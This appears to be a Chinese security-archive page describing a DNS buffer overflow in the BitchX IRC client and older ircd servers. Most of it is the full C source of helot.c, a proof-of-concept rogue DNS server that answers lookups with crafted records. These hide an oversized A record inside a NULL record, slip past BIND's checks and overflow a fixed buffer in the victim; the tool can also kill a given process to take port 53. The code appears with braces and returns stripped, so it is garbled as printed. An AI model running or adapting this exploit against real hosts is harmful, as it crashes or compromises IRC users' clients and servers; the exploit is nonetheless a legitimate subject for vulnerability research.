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BitchX DNS 缓冲区溢出漏洞



Colten Edwards BitchX 1.0c17

BitchX是一个常用的Unix IRC客户端软件。它的某些版本存在一个安全问题,

BitchX DNS解析的代码部分存在一个缓冲区溢出漏洞。如果攻击者可以控制

<*来源:nimrood (nimrood@onebox.com) *>


警 告


* helot.c - bitchx/ircd DNS overflow demonstration
* w00w00 Security Development (WSD)
* 12.04.2000 nimrood (nimrood@onebox.com)
* this same code i used to exploit an ircd DNS spoofing bug
* from early '99. re-usable code is great.
* this program is fun to play with if you're messing with DNS.
* the packet builder is MakeDNSPkt(). this tool compiles on my
* linux systems with no problems.
*  Greetings :: #!w00w00, caddis, dmess0r, nocarrier, nyt,
*                   superluck, otgpdvt, awr, metabolis, sq, bb0y
* ----------------------------------
* problem 1: --> generic ircd
* current and older irc servers suffer from a common bug.
* a pointer is not updated correctly when handling unsupported
* RR types (eg: T_NULL). this makes the server think
* it received a malformed packet when trying to process the next RR.
* it's not a really serious bug, but it allows for a neat trick:
* you can embed any RR type in an unsupported RR (eg: T_NULL). these
* embedded RR's are not checked for errors or dropped by nameservers...
* problem 2: --> bitchx all versions, remote code excecution
* bitchx appears to use code from older irc servers to perform dns
* lookups. this old code suffers from a bcopy/memcpy overflow while
* processing T_A RR's. The T_A RR data length is used in a subsequent
* memcpy without bounds checking. the overflowed variable stores an
* IP address, only 4 bytes long. this is similar to the I_QUERY BIND
* overflow. bitchx dns also suffers from problem 1.
* from bitchx-1.0c17, ./source/misc.c : ar_procanswer()
* line 2639:
*           dlen =  (int)_getshort(cp);
*           cp += sizeof(short);
*           rptr->re_type = type;
*           switch(type)
*           {
*           case T_A :
*                   rptr->re_he.h_length = dlen;
*                   if (ans == 1)
*                           rptr->re_he.h_addrtype=(class == C_IN) ? AF_INET : AF_UNSPEC;
*                   memcpy(&dr, cp, dlen);
* problem 3: --> comstud ircd, remote code execution
* funny enough, while working on the bitchx overflow, i accidentally
* connected a client using the wrong IP to a comstud ircd...it died.
* i found comstud-1.x releases are not vulnerable.
* i suspect other ircd server varients will be vulnerable. i would
* recommend upgrading to a comstud-1.x release. hybrid-ircd team fixed
* this bug a while back with the release of hybrid-5.3p3.
* from irc2.8.21+CSr31pl2, ./source/res.c : proc_answer()
* line 548:
*          dlen =  (int)_getshort((u_char *)cp);
* line 565:
*          switch(type)
*          {
*          case T_A :
*                  hp->h_length = dlen;
*                  if (ans == 1)
*                          hp->h_addrtype =  (class == C_IN) ? AF_INET : AF_UNSPEC;
*                  bcopy(cp, (char *)&dr, dlen);
* there are no bad guys... just disturbed guys.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <arpa/inet.h>

/* for whatever reason, these may need to be defined */
#ifndef u_char
#define u_char unsigned char
#ifndef u_short
#define u_short unsigned short
#ifndef u_long
#define u_long unsigned long

#define DNS_PORT 53

extern int optind, optopt;
extern char *optarg;

/* used for converting query type integer to respective string */
struct qtype_list
int type;
char *name;
const struct qtype_list qtypelist[] =
{T_A,  "A"},
{T_NS,  "NS"},
{T_SOA,  "SOA"},
{T_PTR,  "PTR"},
{T_MX,  "MX"},
{T_ANY,  "ANY"},
{T_WKS,  "WKS"},
{0,  "(unknown)"}

void CatchSigInt(int sig)
signal(SIGINT, SIG_DFL);

void Usage(char *prog)
fprintf(stderr, "\
usage: %s [-k pid] [-t ttl] [-b ip] ip hostname\n\
  ip           ip address to answer reverse lookups for\n\
  hostname     hostname to be mapped to ip, and answer forward lookups\n\
  -k           kill this process before binding dns port\n\
  -t           cache time-to-live (seconds) for this answer (default: 900)\n\
  -b           bind the nameserver to this address (default, all addresses)\n",

char *ip2InAddrStr(u_long ip)
static char *str;
u_char *byte;

  if((str=malloc(MAXLABEL)) == NULL)

/* IP should be in network order to generate a proper in-addr */
byte = (u_char *)&ip;
sprintf(str, "%d.%d.%d.%d.IN-ADDR.ARPA.", byte[3], byte[2], byte[1],


u_short ExpandDName(char *comp, char *dest, u_short len)
        char *cp, *cp2;
        u_short num;

        cp = comp; cp2 = dest;
        if(strchr(cp, '.') && strlen(cp) < len)
                strcpy(cp2, cp);
                if(*(cp2 + strlen(cp2)) != '.')
                        strcat(cp2, ".");

        while((*cp) && (cp))
                num = (u_char)*cp;
                if(num + (cp2 - dest) > len)
                memcpy(cp2, ++cp, num);
                cp += num; cp2 += num;
                *(cp2++) = '.';
        *cp2 = 0;
        return(cp2 - dest);

int CompDName(char *buf, char *dname)
char *p = buf, *p1;

while((*dname) && (dname))
  if((*dname == '.') && (!*(dname + 1)))
  p1 = strchr(dname, '.');
   p1 = strchr(dname, 0);
  *(p++) = p1 - dname;
  memcpy(p, dname, p1 - dname);
  p += p1 - dname;
  dname = p1;
*(p++) = 0;
return(p - buf);

* ProcDNSPkt()
* desc: process a packet, return query name IF it's a question
* input: pointer to packet buffer, packet buffer length
* output: pointer to query name string, or NULL, type of query
char *ProcDNSPkt(char *pkt, u_short pktlen, int *qtype)
static char *qname;
char *qRR;
HEADER *dnshdr;
int qnamelen;

/* do we even have something to look at? */
if(pkt == NULL || pktlen < (HFIXEDSZ + QFIXEDSZ))
dnshdr = (HEADER *)pkt;

/* check query response flag */

/* check that we have only a question in this packet */
if(ntohs(dnshdr->qdcount) != 1 || ntohs(dnshdr->arcount) != 0 ||
  ntohs(dnshdr->nscount) != 0 || ntohs(dnshdr->arcount) != 0)

  if((qname = malloc(MAXDNAME)) == 0)
   fprintf(stderr, "no memory for qname\n");
qnamelen = ExpandDName(pkt+HFIXEDSZ, qname, MAXDNAME);
if(qnamelen == 0)

/* extract the query type received and fill in qtype */
qRR = pkt + HFIXEDSZ + strlen(pkt + HFIXEDSZ) + 1;
GETSHORT(qnamelen, qRR);
*qtype = qnamelen;

* QType2Str()
* desc: convert query type integer to a string representation
* input: query type
* output: pointer to string of query type
char *QType2Str(int qtype)
int i = 0;

while(qtypelist[i].type && qtypelist[i].type != qtype)

* MakeDNSPkt()
* desc: make a dns answer packet for a question
* input: pointer to original query packet to build answer for, pointer to
* answer packet buffer, buffer length, answer data, additional data,
* time-to-live
* output: returns size of answer packet, or NULL
u_short MakeDNSPkt(char *qpkt, char *apkt, u_short alen, char *answer,
char *additional, u_long ttl)
u_short sz, offset;
int qtype;
HEADER *qhdr, *ahdr;
char *query, *aquery, *answerRR;
char qname[MAXDNAME]; /* domain name label scratch pad */
char *cp, *cp2;

/* do some checks */
if(qpkt == NULL || apkt == NULL || answer == NULL || additional == NULL)

/* setup pointers */
qhdr = (HEADER *)qpkt; ahdr = (HEADER *)apkt;
query = qpkt + HFIXEDSZ; aquery = apkt + HFIXEDSZ;

/* answer packet dns header, we use the query packet's hdr */
if(alen < HFIXEDSZ)
memcpy(ahdr, qhdr, HFIXEDSZ);
ahdr->qr = 1; /* query response */
ahdr->aa = 1; /* authoratative answer */
ahdr->rcode = NOERROR;

/* copy original query info to answer packet */
memcpy(aquery, query, (strlen(query) + QFIXEDSZ + 1));
aquery += strlen(query) + 1;
GETSHORT(qtype, aquery);
answerRR = aquery + INT16SZ;

/* build the answer RR's based on query type */
sz = CompDName(qname, answer);

  case T_PTR:
   /* answer the original question. this RR's data
    * comes from the "hostname" cmdline option.
    * this is a normal and valid resource record
   PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
   PUTSHORT(T_PTR, answerRR);
   PUTSHORT(C_IN, answerRR);
   PUTLONG(ttl, answerRR);
   PUTSHORT(sz, answerRR);
   memcpy(answerRR, qname, sz);
   offset = answerRR - apkt; /* offset used for compression */
   answerRR += sz;

   /* this RR, T_NULL demonstrates problem 1. this RR has
    * an embedded T_A record in it's data field
   PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
   PUTSHORT(T_NULL, answerRR);
   PUTSHORT(C_IN, answerRR);
   PUTLONG(ttl, answerRR);
   cp = answerRR; /* pointer to T_NULL RR's data lengh */
   PUTSHORT(0, answerRR);
   cp2 = answerRR; /* pointer to start of embedded T_A RR */
   /* T_A record is actually embedded in the T_NULL record.
    * bitchx/ircd will read into this T_A record on the next loop.
    * this lets us get around restrictions in BIND on T_A RR's
    * this RR causes problems 2 & 3 -- the overflow
   PUTSHORT((offset | 0xc000), answerRR);
   PUTSHORT(T_A, answerRR);
   PUTSHORT(C_IN, answerRR);
   PUTLONG(ttl, answerRR);
   PUTSHORT(180, answerRR); /* overflow with 180 N's */
   memset(answerRR, 'N', 180);
   answerRR += 180;

   /* compute size of embedded T_A & update T_NULL's dlength */
   PUTSHORT((answerRR - cp2), cp);

   /* this record is needed to continue the dns loop in
    * bitchx/ircd. it can be any RR, i used T_NULL
                        PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
                        PUTSHORT(T_NULL, answerRR);
                        PUTSHORT(C_IN, answerRR);
                        PUTLONG(ttl, answerRR);
                        PUTSHORT(0, answerRR);

   ahdr->ancount = htons(3);
   ahdr->nscount = htons(0);
   ahdr->arcount = htons(0);

  case T_A:
   /* BIND deems T_A records with data length <> 4 bytes
    * to be malformed. so we must embed the RR.
   PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
   PUTSHORT(T_NULL, answerRR);
   PUTSHORT(C_IN, answerRR);
   PUTLONG(ttl, answerRR);
   cp = answerRR;
   PUTSHORT(0, answerRR);
   cp2 = answerRR;

   /* problem 2 & 3 demonstrated with a T_A query */
   PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
   PUTSHORT(T_A, answerRR);
   PUTSHORT(C_IN, answerRR);
   PUTLONG(ttl, answerRR);
   PUTSHORT(180, answerRR);
   memset(answerRR, 'A', 180);
   answerRR += 180;

   /* fix up the size of the T_NULL */
   PUTSHORT((answerRR - cp2), cp);

   /* another T_NULL ... */
                        PUTSHORT((HFIXEDSZ | 0xc000), answerRR);
                        PUTSHORT(T_NULL, answerRR);
                        PUTSHORT(C_IN, answerRR);
                        PUTLONG(ttl, answerRR);
                        PUTSHORT(0, answerRR);

   ahdr->ancount = htons(2);
                        ahdr->nscount = htons(0);
                        ahdr->arcount = htons(0);

   fprintf(stderr, "\ntype %d query not supported\n",

return(answerRR - (char *)ahdr);

* SocketBind()
* desc: get's a udp socket and binds it to dns port 53 and an IP address
* input: pid to kill before bind, struct sockaddr initialize, IP address
* output: socket descriptor, or -1 on error
int SocketBind(u_short pid, struct sockaddr_in *sa, u_long listen_ip)
int sd, sockopt, sockoptlen;

if((sd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  perror("can't get a udp socket");

  fprintf(stderr, "killing pid %u...", pid);
  if(kill(pid, SIGKILL) < 0)
   perror("can't kill process");
  fprintf(stderr, "killed.\n");

sa->sin_family = AF_INET;
sa->sin_port = htons(DNS_PORT);
sa->sin_addr.s_addr = listen_ip;
sockopt = 1; sockoptlen = 4;
setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&sockopt, sockoptlen);

if(bind(sd, (struct sockaddr *)sa, sizeof(struct sockaddr)) < 0)
  perror("can't bind dns port 53");

fprintf(stderr, "listening on %s...\n", inet_ntoa(sa->sin_addr));

* SendPkt()
* desc: send dns answer packet into the great unknown
* input: socket, received packet, answer string, additional answer, ttl,
* struct sockaddr from, from length
* output: returns # bytes sent, < 0 on error
int SendPkt(int sd, char *rbuf, char *answer, char *additional, u_long ttl,
struct sockaddr_in *to, int tolen)
char sbuf[PACKETSZ];
int slen, sent;

slen = MakeDNSPkt(rbuf, sbuf, PACKETSZ, answer, additional, ttl);
  fprintf(stderr, "error building answer packet\n");
if((sent = sendto(sd, sbuf, slen, 0, (struct sockaddr *)to, tolen)) < 0)
  perror("sending answer packet");

* main()
int main(int argc, char *argv[])
int sd, opt, rlen, fromlen, sent, qtype;
u_short killpid = 0;
u_long ttl = (15 * 60), ip, bind_ip = 0;
char rbuf[PACKETSZ];
char *qname = NULL,  *inaddrstr = NULL, *hostname = NULL;
struct sockaddr_in named, from;
fd_set dns;

helot.c - bitchx/ircd DNS overflow demonstration
12.04.2000 nimrood (nimrood@onebox.com)
w00w00 Security Development (WSD)\n\n");

while((opt = getopt(argc, argv, "k:t:b:")) != -1)
   case 'k':
    killpid = atoi(optarg);
   case 't':
    ttl = strtoul(optarg, NULL, 0);
   case 'b':
    if((bind_ip = inet_addr(optarg)) == -1)
     "%s is not an ip address!\n", optarg);
   case '?':
    /* NOT REACHED */
    fprintf(stderr, "getopt() error doh!\n");

/* get ip address and hostname to use for answers */
if((argc - optind) != 2)

if((ip = inet_addr(argv[optind])) == -1)
  fprintf(stderr, "%s not an ip address!\n", argv[optind]);

        /* get a socket and bind it to the dns port 53 */
        if((sd = SocketBind(killpid, &named, bind_ip)) < 0)
                fprintf(stderr, "error setting up network!\n");
                goto exit_helot;

if((hostname = malloc(strlen(argv[++optind]) + 2)) == NULL)
  fprintf(stderr, "can't get memory for hostname!\n");
  goto exit_helot;
strcpy(hostname, argv[optind]);
if(*(hostname + strlen(hostname)) != '.')
  strcat(hostname, ".");

if((inaddrstr = ip2InAddrStr(ip)) == NULL)
  fprintf(stderr, "can't get memory for in-addr string!\n");
  goto exit_helot;

/* catch ctrl-c so i can free used memory */
signal(SIGINT, CatchSigInt);

  FD_SET(sd, &dns);
  if(select((sd + 1), &dns, NULL, NULL, NULL) < 0)
   perror("error on listening socket");

  if(FD_ISSET(sd, &dns))
   fromlen = sizeof(from);
   if((rlen = recvfrom(sd, rbuf, PACKETSZ, 0,
    (struct sockaddr *)&from, &fromlen)) < 0)
    perror("error reading from socket");

    fprintf(stderr, "from %s, empty packet\n",

   if((qname = ProcDNSPkt(rbuf, rlen, &qtype)) == NULL)
    fprintf(stderr, "from %s, no query\n",
   fprintf(stderr, "from %s, %s/%s, query", inet_ntoa(from.sin_addr),
    qname, QType2Str(qtype));

   if(strcasecmp(qname, inaddrstr) == 0 && qtype == T_PTR)
    sent = SendPkt(sd, rbuf, hostname, (char *)&ip,
     ttl, &from, fromlen);
    if(sent <= 0)
     fprintf(stderr, "no answer sent!!\n");

    fprintf(stderr, " answered.\n");

   if(strcasecmp(qname, hostname) == 0 && qtype == T_A)
    sent = SendPkt(sd, rbuf, hostname, (char *)&ip,
     ttl, &from, fromlen);
    if(sent <= 0)
     fprintf(stderr, "no answer sent!!\n");

    fprintf(stderr, " answered\n");

fprintf(stderr, "\ncleaning up...\n");
free(qname); free(hostname); free(inaddrstr); close(sd);


